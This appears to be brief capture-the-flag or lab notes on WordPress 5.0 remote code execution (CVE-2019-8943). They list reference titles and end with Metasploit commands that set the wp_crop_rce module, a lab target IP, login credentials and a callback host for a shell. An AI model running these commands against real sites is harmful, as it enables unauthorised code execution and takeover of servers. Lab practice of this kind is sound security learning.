Wordpress 5 RCE
This attack is very complicated and hard to understand for beginners
- WordPress 5.0.0 Remote Code Execution
- The detailed analysis of WordPress 5.0 RCE - by Knownsec 404 team
- Analysis of a WordPress Remote Code Execution Attack - Pentest-Tools.com Blog
- CVE-2019-8943 exploit by v0lck3r
- Metasploit Commands
use exploit/multi/http/wp_crop_rce
set rhosts 10.10.188.55
set username kwheel
set password cutiepie1
set lhost tun0